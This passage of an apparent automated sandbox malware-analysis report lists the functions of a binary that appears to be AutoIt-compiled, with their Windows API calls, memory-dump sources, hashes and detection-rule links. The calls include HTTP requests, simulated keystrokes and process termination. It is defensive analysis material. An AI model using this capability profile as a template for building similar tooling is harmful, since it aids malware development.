                                                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005A2E1C
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 005A2E4F
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 005A2E84
                                                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 005A2EB6
                                                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 005A2EE0
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 005A2EF1
                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 005A2F0B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 2178440468-2594219639
                                                                                                                        • Opcode ID: a10d1cbca326467a2bf8d54234813347081dd57b8fbb8e05d43d1b0f40771c60
                                                                                                                        • Instruction ID: 1ece014ebc33cc210ac4a3980a161cae4336022ef94b4a8af5ac0834027a5871
                                                                                                                        • Opcode Fuzzy Hash: a10d1cbca326467a2bf8d54234813347081dd57b8fbb8e05d43d1b0f40771c60
                                                                                                                        • Instruction Fuzzy Hash: EC31E230604150AFDB25CF5CDC86F693BE9FBAA710F150164F944CF2A2CB71A884EB41
                                                                                                                        Function 0058C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0058C272
                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0058C29A
                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0058C2CA
                                                                                                                        • GetLastError.KERNEL32 ref: 0058C322
                                                                                                                        • SetEvent.KERNEL32(?), ref: 0058C336
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0058C341
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3113390036-3916222277
                                                                                                                        • Opcode ID: 98d7d3055c148619287e8690006587210a279fd393ab516df3775419a9338fdd
                                                                                                                        • Instruction ID: 7790a83be29ec81c6077cf97ffaada539440bc72bc764fc059f9443af2f9ae57
                                                                                                                        • Opcode Fuzzy Hash: 98d7d3055c148619287e8690006587210a279fd393ab516df3775419a9338fdd
                                                                                                                        • Instruction Fuzzy Hash: 64317FB1500604AFD721AF649C88AAB7FFCFB59744F10891EF886A2240DB34DD099B70
                                                                                                                        Function 0057989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00553AAF,?,?,Bad directive syntax error,005ACC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 005798BC
                                                                                                                        • LoadStringW.USER32(00000000,?,00553AAF,?), ref: 005798C3
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00579987
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                        • API String ID: 858772685-4153970271
                                                                                                                        • Opcode ID: cf11680bd29c287107490eb45fe4780d5aca51db3f22cd620debb7e661b1d1b6
                                                                                                                        • Instruction ID: 3543e181bf1943ab2dec9d3879c9b890ed7313b46a79ed3319eb8e9b89e6397c
                                                                                                                        • Opcode Fuzzy Hash: cf11680bd29c287107490eb45fe4780d5aca51db3f22cd620debb7e661b1d1b6
                                                                                                                        • Instruction Fuzzy Hash: 3D21943180021BBBDF11AF90DC5AEED7F75FF54300F044826F519620A1EB71AA58EB60
                                                                                                                        Function 0054CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1282221369-0
                                                                                                                        • Opcode ID: 35c5133244bc30a076be77cc1833b6e730a0e82258f093994e484aa6b43f7f69
                                                                                                                        • Instruction ID: 0c4c8da63d30988a50988f37c33bf85e18892c3feaad86dce66b3f4f2a063d49
                                                                                                                        • Opcode Fuzzy Hash: 35c5133244bc30a076be77cc1833b6e730a0e82258f093994e484aa6b43f7f69
                                                                                                                        • Instruction Fuzzy Hash: FF618771905312BFDB25AFB49C89AEE7FA5FF81318F04016DF9449B282EB359C489760
                                                                                                                        Function 0058C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0058C182
                                                                                                                        • GetLastError.KERNEL32 ref: 0058C195
                                                                                                                        • SetEvent.KERNEL32(?), ref: 0058C1A9
                                                                                                                          • Part of subcall function 0058C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0058C272
                                                                                                                          • Part of subcall function 0058C253: GetLastError.KERNEL32 ref: 0058C322
                                                                                                                          • Part of subcall function 0058C253: SetEvent.KERNEL32(?), ref: 0058C336
                                                                                                                          • Part of subcall function 0058C253: InternetCloseHandle.WININET(00000000), ref: 0058C341
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 337547030-0
                                                                                                                        • Opcode ID: cfdfb2378b12210eccc5a6195d0abf4f229cbddccc759d77990079f3f2e33ecd
                                                                                                                        • Instruction ID: ef4ebc6702325274392a1a6c707f3af78ee6a66c85632095370511702284238e
                                                                                                                        • Opcode Fuzzy Hash: cfdfb2378b12210eccc5a6195d0abf4f229cbddccc759d77990079f3f2e33ecd
                                                                                                                        • Instruction Fuzzy Hash: 46318075200601AFDB21AFB5DC48A66BFF9FF69300B00441DF997A2650DB31E814EB70
                                                                                                                        Function 005725A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00573A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00573A57
                                                                                                                          • Part of subcall function 00573A3D: GetCurrentThreadId.KERNEL32 ref: 00573A5E
                                                                                                                          • Part of subcall function 00573A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005725B3), ref: 00573A65
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 005725BD
                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005725DB
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 005725DF
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 005725E9
                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00572601
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00572605
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0057260F
                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00572623
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00572627
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2014098862-0
                                                                                                                        • Opcode ID: e960b58145b9f48b7a03b2e116e9c117e650d9a739f5235b9cb96ab3c7203277
                                                                                                                        • Instruction ID: 6c4d37684ed6d9e3cd017629e0a6cd174e5f0399fcc14a979a4e7f699d898d2d
                                                                                                                        • Opcode Fuzzy Hash: e960b58145b9f48b7a03b2e116e9c117e650d9a739f5235b9cb96ab3c7203277
                                                                                                                        • Instruction Fuzzy Hash: 6E01D431390210BBFB1067699C8EF593F59EB9EB12F104001F318AF0D1C9E22449EA69
                                                                                                                        Function 00571803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00571449,?,?,00000000), ref: 0057180C
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00571449,?,?,00000000), ref: 00571813
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00571449,?,?,00000000), ref: 00571828
                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00571449,?,?,00000000), ref: 00571830
                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00571449,?,?,00000000), ref: 00571833
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00571449,?,?,00000000), ref: 00571843
                                                                                                                        • GetCurrentProcess.KERNEL32(00571449,00000000,?,00571449,?,?,00000000), ref: 0057184B
                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00571449,?,?,00000000), ref: 0057184E
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00571874,00000000,00000000,00000000), ref: 00571868
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1957940570-0
                                                                                                                        • Opcode ID: 09e8468a245220e03fdfcd945d78faa8b3f697f1e8659289c2849273603031c6
                                                                                                                        • Instruction ID: 46fec11f13f0ccf2d9f6bbdd5053c8cba2646cac1bf36057acf69a3238f3dc8e
                                                                                                                        • Opcode Fuzzy Hash: 09e8468a245220e03fdfcd945d78faa8b3f697f1e8659289c2849273603031c6
                                                                                                                        • Instruction Fuzzy Hash: 5701BBB5340308BFE710ABA5DC4DF6B3FACEB9AB11F008411FA05DB1A1DA709804DB20
                                                                                                                        Function 0059A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0057D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0057D501
                                                                                                                          • Part of subcall function 0057D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0057D50F
                                                                                                                          • Part of subcall function 0057D4DC: CloseHandle.KERNEL32(00000000), ref: 0057D5DC
                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0059A16D
                                                                                                                        • GetLastError.KERNEL32 ref: 0059A180
                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0059A1B3
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0059A268
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 0059A273
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0059A2C4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                        • Opcode ID: ac8467f77acd6d20e48965530fabdb13270f78c6b943394862487d9f12b233cc
                                                                                                                        • Instruction ID: e0704fa6ca13c87619b056634e1cb1450a27cccd01a9f3c3f23e821b2de89b9e
                                                                                                                        • Opcode Fuzzy Hash: ac8467f77acd6d20e48965530fabdb13270f78c6b943394862487d9f12b233cc
                                                                                                                        • Instruction Fuzzy Hash: 5D615E342042429FEB10DF18C498F55BFA1BF94318F14849CE4664B7A2C776ED45CBD2
                                                                                                                        Function 0057BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0057BCFD
                                                                                                                        • IsMenu.USER32(00000000), ref: 0057BD1D
                                                                                                                        • CreatePopupMenu.USER32 ref: 0057BD53
                                                                                                                        • GetMenuItemCount.USER32(015155B8), ref: 0057BDA4
                                                                                                                        • InsertMenuItemW.USER32(015155B8,?,00000001,00000030), ref: 0057BDCC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                        • String ID: 0$2
                                                                                                                        • API String ID: 93392585-3793063076
                                                                                                                        • Opcode ID: 494da3f4b1aa77ae215433e21e77289b6ffb16378bea6289337b786cb5ad49f7
                                                                                                                        • Instruction ID: 2c2c97a1fb7455183e1d6cc62613661665a13b37a265714c6c8adc8c2d7d318f
                                                                                                                        • Opcode Fuzzy Hash: 494da3f4b1aa77ae215433e21e77289b6ffb16378bea6289337b786cb5ad49f7
                                                                                                                        • Instruction Fuzzy Hash: 72519F70A002059FEB21CFA8E888BAEBFF4BF55314F14C519E419D7291E7719944EB51
                                                                                                                        Function 00532D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00532D4B
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00532D53
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00532DE1
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00532E0C
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00532E61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                        • String ID: &HS$csm
                                                                                                                        • API String ID: 1170836740-2847240634
                                                                                                                        • Opcode ID: 60946cf2c6352f6042e4c9637a5862af839fd061c5a36f7a07a9601b591cae74
                                                                                                                        • Instruction ID: 0bea1da9764ef4f34922b89c5fa33763107bcb5945878550b89b573c13aae0ce
                                                                                                                        • Opcode Fuzzy Hash: 60946cf2c6352f6042e4c9637a5862af839fd061c5a36f7a07a9601b591cae74
                                                                                                                        • Instruction Fuzzy Hash: C841A434A01609EBCF10DF68C849A9EBFB5BF84324F148555E915AB392D731EE06CBD0
                                                                                                                        Function 005A81DB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0056F3AB,00000000,?,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 005A824C
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 005A8272
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 005A82D1
                                                                                                                        • ShowWindow.USER32(00000000,00000004), ref: 005A82E5
                                                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 005A830B
                                                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 005A832F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 642888154-2594219639
                                                                                                                        • Opcode ID: 302fec1ea4a281543b8c0a1868243c3f5b1eb525ff7c0e8d4391959ef76cc2c5
                                                                                                                        • Instruction ID: 1e32dd9f8b9f24350eac1461971b1f38191ecfe6c4d8894e7d7143417267ca4d
                                                                                                                        • Opcode Fuzzy Hash: 302fec1ea4a281543b8c0a1868243c3f5b1eb525ff7c0e8d4391959ef76cc2c5
                                                                                                                        • Instruction Fuzzy Hash: BC419F34601A44AFDF25CF14DC99BB87FE0BF5BB14F1851A9E6488F2A2CB31A845DB50
                                                                                                                        Function 00574C7D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00574C95
                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00574CB2
                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00574CEA
                                                                                                                        • _wcslen.LIBCMT ref: 00574D08
                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00574D10
                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 00574D1A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 72514467-2594219639
                                                                                                                        • Opcode ID: d763830b7d5f75db12c6a3a52d3419033079fe7275d5753bdde1d5986edf1efe
                                                                                                                        • Instruction ID: ea13f0270ee074d96add9a742b390796300102f201a5ab985024bad39e9a3012
                                                                                                                        • Opcode Fuzzy Hash: d763830b7d5f75db12c6a3a52d3419033079fe7275d5753bdde1d5986edf1efe
                                                                                                                        • Instruction Fuzzy Hash: BD21DA31204111BBEB269B39BC49E7B7FACEF46750F108079F809CE191EB61DC00ABA0
                                                                                                                        Function 0057C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 0057C913
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconLoad
                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                        • Opcode ID: ea2bc0b084ce332786ab556cd7c5520075d54c1e45639393e8a50dd1be2c80e2
                                                                                                                        • Instruction ID: e212c30a210cf7aa27542c3ff9acd9c788ff0629e0f630f1785aae49e8fb743c
